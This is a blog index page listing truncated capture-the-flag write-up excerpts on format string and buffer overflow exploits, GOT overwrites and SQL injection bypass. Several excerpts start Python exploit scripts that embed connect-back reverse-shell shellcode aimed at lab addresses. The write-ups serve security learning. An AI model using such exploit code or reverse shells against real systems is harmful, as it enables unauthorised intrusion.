CTF

· CTF
Category : Pwnables NULL Summary : Format String Vulnerability on Ubuntu, overwrite puts@got Server Info. user20280@ubuntu:~$ uname -a Linux ubuntu 2.6.38-11-generic #50-Ubuntu SMP Mon Sep 12 21:18:14 UTC 2011 i686 i686 i386 GNU/Linux The server runs Ubuntu, but ASLR is disabled. The provided files are bin3, which is setgid to the flag user, and challenge3.c, the C source file for bin3. challenge3.c #include #include #include inline int ad..
· CTF
Category : Pwnables NULL Summary : simple buffer overflow on Ubuntu, GOT overwriting with sprintf Server info user20280@ubuntu:~$ uname -a Linux ubuntu 2.6.38-11-generic #50-Ubuntu SMP Mon Sep 12 21:18:14 UTC 2011 i686 i686 i386 GNU/Linux The server runs Ubuntu, but ASLR is disabled. The only file provided is bin1, which is setgid to the flag user. It can be decompiled with Hex-Rays for analysis. void main(int argc, char **argv) { if ( argc == ..
· CTF
Category : Pwnables * file Summary : simple remote buffer overflow Binary Info. [pwn3r@localhost rr200]$ file rr200 rr200: ELF 32-bit LSB executable, Intel 80386, version 1 (FreeBSD), dynamically linked (uses shared libs), stripped The main function daemonizes the process and then runs the client_callback function for each connecting client. (The function name is one I chose arbitrarily.) First, connect to the server. [pwn3r@localhost rr200]$ nc 192.168.123.134 9999 Hans Brix? Oh no! ..
· CTF
Category : Reversing * file Summary : bypass authentication on ELF binary by SQL injection Binary info. [retro300@localhost ~]$ file retro300 retro300: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.32, stripped [retro300@localhost ~]$ file auth.db auth.db: SQLite 3.x database int main() { int sock_fd; sock_fd = sock_init(word..
· CTF
exploit.py #!/usr/bin/python from socket import * import time def pack(data): res = "" for i in range(0,4): res = res + chr(data % 0x100) data = data / 0x100 return res HOST = "192.168.123.129" PORT = 9999 SHELLCODE = \ "\x68\xc0\xa8\x7b\x83\x68\xff\x02\x11\x5c\x89\xe7\x31\xc0" + \ "\x50\x6a\x01\x6a\x02\x6a\x10\xb0\x61\xcd\x80\x57\x50\x50" + \ "\x6a\x62\x58\xcd\x80\x50\x6a\x5a\x58\xcd\x80\xff\x4..
· CTF
exploit.py #!/usr/bin/python from socket import * import time def pack(data): res = "" for i in range(0,4): res = res + chr(data % 0x100) data = data / 0x100 return res HOST = "192.168.123.129" PORT = 1127 SHELLCODE = \ "\x68\xc0\xa8\x7b\x83\x68\xff\x02\x11\x5c\x89\xe7\x31\xc0" + \ "\x50\x6a\x01\x6a\x02\x6a\x10\xb0\x61\xcd\x80\x57\x50\x50" + \ "\x6a\x62\x58\xcd\x80\x50\x6a\x5a\x58\xcd\x80\xff\x4..
· CTF
Category : Pwnables * file Summary : overwriting max length of receiving data exploit.py #!/usr/bin/python from socket import * import time def pack(data): res = "" for i in range(0,4): res = res + chr(data % 0x100) data = data / 0x100 return res HOST = "192.168.123.129" PORT = 3555 SHELLCODE = \ "\x68\xc0\xa8\x7b\x83\x68\xff\x02\x11\x5c\x89\xe7\x31\xc0" + \ "\x50\x6a\x01\x6a\x02\x6a\x10\xb0\x61\..
· CTF
Category : Coding , Reverse engineering * binary Summary : generate serial [pwn3r@localhost ~]$ nc 192.168.0.13 8888 ZsIdTLcuTNYdJXa pwn3r Invalid router. Routing failed :( [pwn3r@localhost ~]$ nc 192.168.0.13 8888 ZxBSKUqrwwYqezO pwn3r Time out :( [pwn3r@localhost ~]$ nc 192.168.0.13 8888 KOkIhGSyESyOWfW aaaaaaaaaaaaaaa WAN ssl Your key is wrong :( exploit.py #!/usr/bin/python from socket impor..
pwn3r_45
List of posts in the 'CTF' category (Page 11)